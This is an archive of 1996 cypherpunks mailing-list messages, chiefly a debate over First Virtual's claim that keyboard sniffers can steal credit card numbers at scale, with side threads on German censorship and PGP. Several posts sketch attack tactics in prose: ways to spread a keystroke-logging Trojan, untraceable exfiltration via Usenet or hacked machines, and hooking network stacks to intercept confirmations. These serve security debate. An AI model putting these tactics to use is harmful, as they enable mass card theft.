What we at FV have done is to demonstrate how easy it is to develop an
FULLY AUTOMATED attack that undermines the security of all
software-based credit card commerce schemes.  It is the automated aspect
that separates it from all of the "dumpster-diving" attacks on credit
card numbers which have previously been widely discussed, because it
provides a path to large-scale fraud that has never been publicly
discussed before, to my knowledge.  The key "invention" in our approach
is to integrate several techniques that are already well-known (in this
community) into an automated attack that we consider to be devastating
to commerce systems based on software-encrypted credit cards.

Our approach combines the following four known problems into a fatal attack:

	1) Consumer machines are insecure and easily compromised.
	2) Keyboard sniffers are easy to write.
	3)  Credit card numbers are self-identifying (they have check digits) 
	    and can easily be extracted from a huge stream of input data.
	4)  Once intercepted, small amounts of information (e.g. a cc #)
	     may be distributed completely tracelessly over the Internet.

When you put all four of these together, you have an attack that IS new,
in the sense that nobody we know of has ever mentioned it before, and
which could in fact be used by a single criminal, with only a few weeks
of programming, to tracelessly steal MILLIONS of credit cards, if
software-encrypted credit-card schemes ever caught on.

This is a very real threat.  If you think we're just re-hashing keyboard
sniffers, you haven't yet understood what we're demonstrating.  The real
threat is the traceless theft of millions of credit card numbers by a
single easily mounted automated attack.

So here's the factual claim, to be proven or disproven:  One good
programmer, in less than a month, can write a program that will spread
itself around the net, collect an unlimited number of credit card
numbers, and get them back to the program's author by non-traceable
mechanisms.  Does anyone on this list doubt that this is true?  If so,
I'd like to know the flaw in my thinking, -- I am *not* too proud to
withdraw any claims that aren't true.  If not, I think it's worth noting
that this fact was previously completely unknown to the bankers and
businessmen who are putting large sums of money at risk on the net.  The
only way to get the message to those communities is with a very visible
public announcement of the kind you saw yesterday.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 23:45:28 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <9601300006.AA15845@sulphur.osf.org>
Message-ID: <sl3SprmMc50eAWY4U=@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Rich
Salz@osf.org (1188)

> You must trust something.  You folks trust the telephone (never gets
> tapped, right) the postal service (of course mail never gets stolen) banks
> or credit card companies (which never have problems).  And then, on top
> of that foundation of sand you build a commerce system with MIME and
> SMTP (sendmail is the most bugfree program ever written).

I certainly don't trust the telephone not to be tapped on an individual basis.

I used to trust the telephone not to be tapped in a selective way based
on keyword recognition, but in recent years, with the improvement in
voice recognition technology, I have stopped trusting it that way, and I
know plenty of other people have too -- if you say "NSA" into a cellular
call, you are probably inviting an eavesdropper.

The Internet environment is EVEN LESS trustable.  Installing the kind of
general phone tap I just mentioned is very hard to do, and requires a
level of access that is almost impossible unless you're the phone
company or the government.  The level of software needed to recognize
spoken keywords is quite sophisticated.  On the Internet, almost anyone
can tap data streams, and almost anyone can install keyboard sniffers on
user machines, and the level of software needed to recognize keywords in
ASCII is very simple.  The risk models are very different.

Similarly, we trust the postal service and certain uses of email not to
be free of any insecurities, but to be hard to defeat in a large scale
automated way.  That kind of statistical risk is the foundation of the
security of the credit card system -- not perfect security, but bounding
of individual risks and preclusion of large-scale attacks.

> Stef's blatant attempts
> to ensure MIME's use in IETF-PAY was not an exception, but the first
> salvo.

I have no idea what you're talking about here.  

> You make me sorry I invented safe-tcl and made FV possible.

I *really* have no idea what you're talking about here.  There are two
ideas here that strike me as delusional: that you invented safe-tcl and
that safe-tcl made FV possible.  To the best of my knowledge, neither of
these is true.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 18:41:06 +0800
To: ecarp@netcom.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <199601300255.VAA17086@dal1820.computek.net>
Message-ID: <Il3SrYKMc50e8WY59d@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Ed
Carp@dal1820.computek (6730*)

> With a Windows program?  I guess it runs on every known platform, under 
> every known OS.  My, that *is* one hell of a program...

Actually, the Mac port is now complete.  A UNIX port would be pretty
trivial too.
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andreas@horten.artcom.de (Andreas Bogk)
Date: Wed, 31 Jan 1996 16:42:18 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Al3GYGSMc50eQWYAdR@nsb.fv.com>
Message-ID: <y8aybqqxr1e.fsf@horten.artcom.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Nathaniel" == Nathaniel Borenstein <nsb@nsb.fv.com> writes:

First, pray tell, what prevents me from writing a virus that patches,
say, Eudora and Netscape, so they automatically reply to all FV-mails?

Or, to quote your security FAQ:

>To defeat this mechanism requires someone to steal a First Virtual
>account identifier; 

... which is plainly and unencrypted visible in the E-Mails ...

>to identify the corresponding email address (which
>is not public knowledge, cannot be determined from the account
>identifier, and will not be released by First Virtual); 

... which is in the header of said E-Mail ...

>to know or guess the account password; 

... which is quite impossible unless you have your own FV shop,
monitor IP traffic or a *malicious program on the user's computer* ...

>to intercept all incoming messages to that email address; 

... which said malicious program is of course completely unable to do ...

>and, of course, to know what First Virtual is and understand what our
>messages are about and how to respond to them.

Wow! I didn't think of that!

And while I'm at it, it doesn't take much to be more secure than
credit card payments. You shouldn't be too proud of that.

And it shouldn't take an experienced programmer one whole week to
write a keyboard sniffer.

But I think it's not too pessimistic to say that _any_ software-based
payment scheme can be hacked using malicious programs.

    Nathaniel> world today.  Once it detects a credit card number, a
    Nathaniel> criminal program could use any of several techniques to
    Nathaniel> send that number to the original criminal without
    Nathaniel> providing any way to trace the criminal's receipt of
    Nathaniel> it.  (If you're skeptical about this claim, we'd prefer
    Nathaniel> to talk with you privately, as we've never seen the
    Nathaniel> "best" methods for doing this spelled out in public,
    Nathaniel> and we would prefer to keep it that way.)

Oh, wow, it's your secret. I would post a message containing the
credit card number encrypted with a public key cipher to
alt.foo.bar. Or to the IRC. And it's not too difficult to hack
university computers, so I could even receive mail there without being
traceable. Not to speak of remailer chains. Any other ideas?

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMQ2Zy0yjTSyISdw9AQEkHwP9HeYucy86Wdre4OuaYAa50YcNZ6LPrJJz
GrvDC5t4LRprAqggtYMRBS7NlJ2+rVV58+6R4WXn66wCLcjpAXq0s5FMxKDoxe9Y
JyKcevK7O9iFLIGzERZkz2RXLmk2PBlUsi8hzS+WsPBe0QfIK1bFW2gEum2eKjlm
bzmq6iI8dx0=
=5NT1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 23:48:45 +0800
To: weld@l0pht.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Pine.BSD/.3.91.960129170118.14124A-100000@l0pht.com>
Message-ID: <cl3T04GMc50eQWY6Qp@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Weld
Pond@l0pht.com (1606*)

> But take away the inputting of the credit card number via keystroke and 
> the flaw disappears.  How would your program deal with a scheme like 
> this?  

Yes, this is a good point, and is one of the approaches we thought of
for defeating this attack.  But bear in mind that our current attack is
targeted against the current input method -- keystrokes.   Any fixed
input method is vulnerable to a similar attack.  For instance:

> Programs needing secure entry create a "secure entry field" which is
> really just an imagemap with the digits (and alphas if required) placed
> randomly about.  The user then uses the mouse to click on these numerals. 
> Ideally the graphics that represent the numerals would be drawn from a
> random pool and are misformed to thwart any OCR attempts. The graphics 
> could be made even more difficult to OCR by mixing in words and pictures 
> to represent the numbers.

If any particular program for doing this came into widespread use, we
could engineer an attack, similar to our keystroke attack, based on the
specific properties of the approach used.  For example, changing the
fonts is a good idea -- I had thought of that -- but if you put the
numerals in boxes in the same relative positions each time, we can find
that.  Ultimately, if you really want commerce to work for hundreds of
millions of people, there will need to be a standard interface, and if
it makes the inputting of credit card numbers too regular, it can easily
be attacked.  If it makes it too irregular, consumers will probably
rebel against it as "too hard to use".  I haven't seen a good middle
ground yet.  Credit card numbers are so regular that the only way to
hide their input is with a very irregular interface, which consumers are
likely to hate.

> An even better solution may be to have the imagemap generated by the 
> server and just the mouse clicks sent back to be decoded on the server.  
> That is how server side imagemaps work now over the web.  It shouldn't be 
> hard to take credit card numbers this way.  
>  
I've actually used one site that takes a similar approach.  Very painful
to use, which illustrates my point about the tradeoff.  More generally,
the tradeoff between security and usability shows up in many other
places, it's just particularly acute and important when it comes to the
entry of credit card numbers.  -- Nathanel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 31 Jan 1996 23:44:54 +0800
To: Alex de Joode <cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <2.2.32.19960130104053.009ba398@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:53 AM 1/28/96 +0100, Alex de Joode wrote:
>
>Belgian TV (the dutch language channel) has a page on teletext (Ceefax)
>[I don't think US tv has that feature] stating that the French backbone
>is thinking about blocking sites that provide information that they deem
>ethicly unacceptable, like sites that promote the denial of Konzentrations
>Lagers, the extreme right, pornografic and pedophile sites.
>
>[page 128 BRTN, for those who can receive BRT]
>
>

What about "the extreme left."  Don't those people deserve to be blocked
too?  And how about US radio stations on RealAudio 2.0.  Cultural Imperialism.  

So how do we overcome these "backbone blocking" maneuvers?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Tue, 30 Jan 1996 19:14:59 +0800
To: andreas@horten.artcom.de (Andreas Bogk)
Subject: Re: Opinion piece in NYT; responses needed
Message-ID: <199601301055.FAA10829@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


>     Mutatis> It's a decentered network (or set of networks) designed
>     Mutatis> to get information to its addressee.  Data flows through
[..]
 
> This is unfortunately a wide-spread myth. While it's true for mail and
> news, it's not for IP packets. Witness:

Duh. You're right. My glitch.
 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 31 Jan 1996 23:50:34 +0800
To: Thomas Roessler <cypherpunks@toad.com
Subject: Re: [FACTS] Germany, or "Oh no not again"
Message-ID: <2.2.32.19960130105347.009a0f90@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:10 PM 1/29/96 +0100, Thomas Roessler wrote:

>In particular, they are right now
>*checking* whether providing internet access is a criminal
>offence due to the possibility to gain access to `inciting
>material' (the German word is `Volksverhetzung') via the Net.

Whether providing mail service is a criminal offence due to the possibility
to gain access to `inciting material.' 

Whether providing phone service is a criminal offence due to the possibility
to gain access to `inciting material.' 

Whether selling radios is a criminal offence due to the possibility to gain
access to `inciting material.' 

Whether selling satellite dishes is a criminal offence due to the
possibility to gain access to `inciting material.' 

Whether teaching reading is a criminal offence due to the possibility to
gain access to `inciting material.' 

>Quite similar to the RSA T-Shirt story in the States. ,-)

But with much more reaction from the prosecutors.  I guess Germans are easy
to set off.  That means BTW that others can control them since they "have to
react."

Has German jurisprudence ever encountered the concept that the person who
requests something like a web page is the "actor" in this drama not the
carrier.  The carrier is not doing anything.  The requestor is controlling
the system momentarily.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Wed, 31 Jan 1996 12:53:28 +0800
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: On the value of signatures (was: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit)
In-Reply-To: <Al3Ie8GMc50e0WY6IN@nsb.fv.com>
Message-ID: <960130.060958.4c1.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, nsb@nsb.fv.com writes:

> I use PGP about 20 times per day.  I use it in a manner that is
> *meaningful*.  Unless we have in some way or another verified each
> others' keys, it is meaningless for me to sign a message to you. 
> Putting a PGP signature on a message to someone who has no way of
> verifying your keys is a nice political statement, but is utterly
> meaningless in terms of adding any proof of the sender's identity.  --

You are incorrect.  Keys can always be obtained, and signatures can be
verified at any time.  But an unsigned message can _never_ be verified
as to its origin.

You may not have my key, but I still sign this message (as I have signed
all my net traffic for over 3 years).  I do this to protect the
reputation capital I've built up.

> PS -- On the off chance that anyone really doubts this is me, I will
> shortly send cypherpunks a message that has my own voice AND a PGP
> signature thereupon.  That way, you can check my identity if you either
> recognize my voice OR have verified my fingerprint.  Sheesh.  -- NB

Sheesh, yourself, Nathaniel (if that _is_ your True Name).  You're
showing a real attitude here, as though your reputation alone should be
enough to convince us of your messages' validity.  A malicious attacker
would be likely to bluster this way to deflect discovery of hir ruse.
We're all nyms on the net.  And yours wears no armor.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQ4PVhvikii9febJAQHqSgP/YTCBuPGD3yKEGQo6oYzr0gfxIs2MJFCB
xJnSS84g4n6yxSz9u8Ffkq/BHsiRA6eFBuIhLdn0nsMORiEneXGadT+Of9+qvZXA
kfr47lC01uZLfldc8CH5gJG3bc4860nz4z4YhNDW1+3jRkKN2Gzp5V1YWKWvTuIl
kKw4L4ZYZCk=
=rkJ/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andreas@horten.artcom.de (Andreas Bogk)
Date: Wed, 31 Jan 1996 09:11:39 +0800
To: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Subject: Re: Opinion piece in NYT; responses needed
In-Reply-To: <199601300105.UAA18553@UNiX.asb.com>
Message-ID: <y8arawixo6l.fsf@horten.artcom.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Mutatis" == Mutatis Mutantdis <wlkngowl@unix.asb.com> writes:

    Mutatis> It's a decentered network (or set of networks) designed
    Mutatis> to get information to its addressee.  Data flows through
    Mutatis> several nodes and networks until it reaches its
    Mutatis> destination.  If it can't get through one path, it goes
    Mutatis> through the other.

This is unfortunately a wide-spread myth. While it's true for mail and
news, it's not for IP packets. Witness:

5:41 bogk@habari% traceroute www.webcom.com                                   ~
traceroute to s1000e.webcom.com (206.2.192.66), 30 hops max, 40 byte packets
 1  jambo-110 (160.45.110.1)  3 ms  2 ms  2 ms
 2  heiss.router.fu-berlin.de (160.45.1.1)  2 ms  1 ms  1 ms
 3  Duesseldorf7.WiN-IP.DFN.DE (188.1.133.65)  38 ms  45 ms  69 ms
 4  ipgate2.win-ip.dfn.de (193.174.74.200)  69 ms  56 ms  71 ms
 5  * ipgate2.win-ip.dfn.de (193.174.74.200)  41 ms !H *
 6  ipgate2.win-ip.dfn.de (193.174.74.200)  44 ms !H *  39 ms !H

BTW: Deutsche Telekom (actually DeTeBerkom, a 100% daughter) is one of
DFN's major players.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMQ2oTEyjTSyISdw9AQGulgP/SCP80zzeSbLnkYjsb3td8g7CvOsC5HUM
85gWT60xZZER8dZr5VOYD/To3ofeZWII0RAELDPCT48Efw06VxkWCUPeVF35yjjB
2GfRIcKBKaqrag2TH4nT91kf0pCqlrRFf7l6x9x0la7qdks40pH/CEWfBzNsYkTQ
9uq9K1gjX1E=
=u9d4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 19:42:59 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601300015.AA15891@sulphur.osf.org>
Message-ID: <8l3TrJ2Mc50eAWY4IF@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Rich
Salz@osf.org (255)

> >There are many ways to spread it besides a virus.  Zillions of 'em.  And

> There are zillions (what, more than one thousand?) ways to get someone
> to run a random piece of software that will capture their keystrokes?

Yes, zillions, although I'm not using that as a technical term.

> I don't believe you.  Name six.

Sure thing, always glad to clarify my claims.

1. (my current favorite) post it to MSN.  There, Microsoft has made
getting infected with a Trojan Horse as easy as clicking on an icon
embedded in a mail or news message.  (You want to try convincing the
average consumer that it isn't safe, if Microsoft makes it that easy?)

2.  Get the sources to a public domain image viewer.  Change them
slightly.  Claim that you've improved it by 13.7%.  Post your improved
(and infected) image viewer to the net.

3.  Ditto for an audio viewer, a mail reader, a news reader,.... 
(zillions right there alone)

4.  Imitate the IBM Christmas exec.  Break into someone's site and steal
their mail aliases file.  Now send mail to everyone on their alias list,
pretending to be them, offering them a cute animation program they can
install.  The animation will happen, but it will also send mail to all
THEIR aliases (like the Christmas exec) and (unlike that) install our
malicious snooping software.

5.  Write a genuinely useful program (or a game) of your own, but embed
your attack in it.  (Caution:  Being the real author will increase your
traceability.)

6.  Write a pornographic screen saver.  Not only will zillions of people
download it, but they will EXPECT the code to watch keystrokes.

7.  [*maybe*] Spread it by Java applet.  This is a maybe because the
level of Java security seems to be browser-discretionary.  Even a
relatively conservative let-the-user-choose approach like Netscape's,
however, can be defeated with a little social engineering, as in "this
is a really cool Java applet to do XYZ, but you'll have to set
Netscape's Java security level to minimum to run it....."

8.  Internet-based breakin/installations, e.g. to NT or anything else
that runs incoming services.

9.  Traditional virus techniques.

Oh, you only asked for 6, sorry.....  Feel free to ignore a few.
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexandra Griffin <acg@mandrake.cen.ufl.edu>
Date: Tue, 30 Jan 1996 20:00:10 +0800
To: cypherpunks@toad.com
Subject: PPP link encryption?
Message-ID: <199601301136.GAA02305@mandrake.cen.ufl.edu>
MIME-Version: 1.0
Content-Type: text


Is there any software out there on the net for doing real-time,
transparent encryption of a PPP link?

Also, if this link is running at 600kbit/s to 1Mbit/s, how much
processing power would be required to keep up (assuming we're using,
say, the IDEA cipher)?  Would a dedicated 386DX/33-based router on
each end be sufficient?

Finally, could someone make a ballpark estimate as to the amount of
additional latency that would be added?

thanks,
- alex





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul M. Cardon" <pmarc@fnbc.com>
Date: Tue, 30 Jan 1996 21:08:44 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601300015.AA15891@sulphur.osf.org>
Message-ID: <199601301239.GAA00246@abernathy.fnbc.com>
MIME-Version: 1.0
Content-Type: text/plain


My mailer insists that Nathaniel Borenstein wrote:
> Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Rich
> Salz@osf.org (255)
>
> > >There are many ways to spread it besides a virus. Zillions of
> > >'em. And
>
> > There are zillions (what, more than one thousand?) ways to get
> > someone to run a random piece of software that will capture their
> > keystrokes?
>
> Yes, zillions, although I'm not using that as a technical term.
>
> > I don't believe you. Name six.
>
> Sure thing, always glad to clarify my claims.
>
> 1. (my current favorite) post it to MSN. There, Microsoft has made
> getting infected with a Trojan Horse as easy as clicking on an icon
> embedded in a mail or news message. (You want to try convincing the
> average consumer that it isn't safe, if Microsoft makes it that
> easy?)
>
> 2. Get the sources to a public domain image viewer. Change them
> slightly. Claim that you've improved it by 13.7%. Post your
> improved (and infected) image viewer to the net.
>
> 3. Ditto for an audio viewer, a mail reader, a news reader,....
> (zillions right there alone)

I count numbers 1, 2 and 3 as one way (Trojan Horse).

> 4. Imitate the IBM Christmas exec. Break into someone's site and
> steal their mail aliases file. Now send mail to everyone on their
> alias list, pretending to be them, offering them a cute animation
> program they can install. The animation will happen, but it will
> also send mail to all THEIR aliases (like the Christmas exec) and
> (unlike that) install our malicious snooping software.

If you can break in that far, I can think of much more imaginative  
things to do with the access.

> 5. Write a genuinely useful program (or a game) of your own, but
> embed your attack in it.

Again, 4 and 5 are the same as 1,2 and 3.  (I thought I smelled  
horse biscuits.)

> (Caution: Being the real author will
> increase your traceability.)

Insultingly obvious.

> 6. Write a pornographic screen saver. Not only will zillions of
> people download it, but they will EXPECT the code to watch
> keystrokes.

YATH (Yet Another Trojan Horse)

> 7. [*maybe*] Spread it by Java applet. This is a maybe because the
> level of Java security seems to be browser-discretionary. Even a
> relatively conservative let-the-user-choose approach like
> Netscape's, however, can be defeated with a little social
> engineering, as in "this is a really cool Java applet to do XYZ,
> but you'll have to set Netscape's Java security level to minimum to
> run it....."

Yes.  Trojan Horse.  Whinny. Neigh.

> 8. Internet-based breakin/installations, e.g. to NT or anything
> else that runs incoming services.

Ahh, finally something other than a Trojan Horse attack, but it  
only affects sites with poor security.  In that case, this attack is  
the least of their problems.

> 9. Traditional virus techniques.
>
> Oh, you only asked for 6, sorry..... Feel free to ignore a few.

Wow, a whole three different attacks and most of them much more  
useful for things other than gathering credit card numbers.

It's sad to think that a lot of people may actually believe this  
crap.  Let's just hope that enough technical users provide rebuttals  
in the other fora where this stuff appears.

---
Paul M. Cardon -- I speak for myself.  'nuff said.

MD5 (/dev/null) = d41d8cd98f00b204e9800998ecf8427e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 30 Jan 1996 22:47:48 +0800
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
In-Reply-To: <Ul3HuJ2Mc50e4WYAA4@nsb.fv.com>
Message-ID: <960130.064105.1H2.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, nsb@nsb.fv.com writes:

> Well, the mis-conceptions are flying fast and furious.

And not just from the rest of us.  Your model is a malicious program
that is installed on a user's machine (through whatever method, be it
viral, trojan horse, black bag job, whatever).  Fine, let's explore it a
bit.

> There are several schemes for Internet commerce
> that are unaffected:
>
>         -- First Virtual (of course)

If all my malicious program does is sniff keystrokes, FV accounts are
less vulnerable.  So I'll make my malicious program not only sniff
keystrokes, but I'll hook your Winsock stack and intercept the POP3
queries.  That way, I can catch the FV verification messages and confirm
them.  You'll never see anything happen.

>         -- Hardware encryption (e.g. consumer card-swipe machines)

So I'll get my malicious program to look for blocks of seemingly random
data from the keyboard (where many swipe systems wedge in) or the com
ports not used by mouse and modem.  (on a PC platform, that's not likely
since heroic measures are needed to run more than 2 com ports)  Unless
seeded by the transaction, these blocks should be vulnerable to a replay
attack.

>         -- Smart cards

Smart cards may not be vulnerable to replay attacks, so you may be
correct here.

>         -- Digital cash (unless the tokens are made too easy to recognize)

Or the site initiating the transaction is recognizable, prompting the
malicious program to take notice.  And since I've hooked all your net
services, I can steal your coins easily... the transactions you send
will never reach their destination.

The "fatal flaw" here is that you haven't extended your threat model to
its logical conclusion.  If you assume a malicious program with access
to the keyboard at the hardware level, that program could also access
and manipulate the TCP/IP stack, as well as data flowing to/from
networked applications of all sorts.

> We say this VERY EXPLICITLY in our web pages. We are NOT saying we have
> the only safe approach.  We have one of four safe approaches that we
> know of.

I only see one approach that's safe from local eavesdropping, and FV
isn't it.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQ4Vihvikii9febJAQH6QgP/UaIlgQEmRgfS27DoOtr30BpTtR3H24bL
6fQRV1c99S7hPCAo3LPK28JH5HLC5WgoLZZBnNfu9eE4YcaSdOgC2Ok4Un3uSI2i
ZFOGP+OPN7BQRE/7iLF9nLT9NmktGiZ0mFffCzqIKGWP/PH87/YJtJzJwlqdTNp4
BCJsnFlX04w=
=osLe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul M. Cardon" <pmarc@fnbc.com>
Date: Tue, 30 Jan 1996 21:32:43 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <199601300255.VAA17086@dal1820.computek.net>
Message-ID: <199601301311.HAA00261@abernathy.fnbc.com>
MIME-Version: 1.0
Content-Type: text/plain


My mailer insists that Nathaniel Borenstein wrote:
> Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Ed
> Carp@dal1820.computek (6730*)
>
> > With a Windows program? I guess it runs on every known platform,
> > under every known OS. My, that *is* one hell of a program...
>
> Actually, the Mac port is now complete. A UNIX port would be pretty
> trivial too.

How about a NEXTSTEP port?  Didn't think so.

---
Paul M. Cardon -- I speak for myself.  'nuff said.

MD5 (/dev/null) = d41d8cd98f00b204e9800998ecf8427e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 30 Jan 1996 21:01:55 +0800
To: Just Rich <rich@c2.org>
Subject: Re: [NOISY] Deutsche Telekom <--> webcom.com "routing troubles"
In-Reply-To: <199601292241.OAA11703@infinity.c2.org>
Message-ID: <wl3UsQO00bkGAFXqQG@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 29-Jan-96 [NOISY] Deutsche Telekom
<-.. by Just Rich@c2.org 
> Someone please inform Deutsche Telekom and the relevant prosecutors that
> by the time they read this (i.e., within an hour), selected files from
> Zundel's holocaust-denial archives (which make me sick, but that's beside
> the point) will be available at the AFS path: 
>  
>  /afs/ir.stanford.edu/users/l/llurch/WWW/Not_By_Me_Not_My_Views/
>  
> One of the ways this directory can be reached is through:
>  
>  http://www-leland.stanford.edu/~llurch/Not_By_Me_Not_My_Views/


I've set up another mirror site at Carnegie Mellon University. In my
mind, the mirror archive exists to demonstrate the folly and the
danger of Internet censorship. It's in is in the AFS directory:
  /afs/cs.cmu.edu/user/declan/www/Not_By_Me_Not_My_Views/

You can access it from the following web servers at these URLs:
  http://www.cs.cmu.edu/afs/cs/user/declan/www/Not_By_Me_Not_My_Views/
  http://www.contrib.andrew.cmu.edu/~declan/Not_By_Me_Not_My_Views/
  http://web.mit.edu/afs/cs.cmu.edu/user/declan/www/Not_By_Me_Not_My_Views/

These servers are fairly robust and load-balanced, and I believe it will
difficult for attacks to succeed against them. In addition, anyone
with access to the globally-distributed AFS network can just cd into
the above AFS directory and read Zundel's files. Some German AFS sites
include, but are not limited to:

   afs-math.zib-berlin.de
   fh-heilbronn.de
   geo.uni-koeln.de
   lrz-muenchen.de
   hrzone.th-darmstadt.de
   mathematik.uni-stuttgart.de
   rhrk.uni-kl.de
   rrz.uni-koeln.de
   rus-cip.uni-stuttgart.de
   tu-chemnitz.de
   urz.uni-heidelberg.de

Deutsche Telekom's hostname-based censorship has already cut off
German users from over 1,500 U.S. businesses, including electronic and
computer businesses, art stores, online banks, and and even the Port
Douglas Visitors Bureau for Queensland, Australia.

If the German government forces Deutsche Telekom to block access to
web servers at Carnegie Mellon University, MIT, and Stanford
University, it will be slicing off communications with three of the
most respected universities in the United States.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 30 Jan 1996 23:10:58 +0800
To: ecarp@netcom.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <Pine.OSF.3.91.960129221928.14389B-100000@nic.wat.hookup.net>
Message-ID: <9601301353.AA15410@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Ed Carp writes:
 > > Not wishing to get in the middle of this controversy, I have been 
 > > wondering about the possibility of using a JAVA applet to do keyboard 
 > > sniffing. As I am not familiar with this language, does anyone know if 
 > > this would be possible?
 > 
 > From what I've read about Java, it is not possible to use Java in this
 > way.

Because Java is a general-purpose programming language, it is indeed
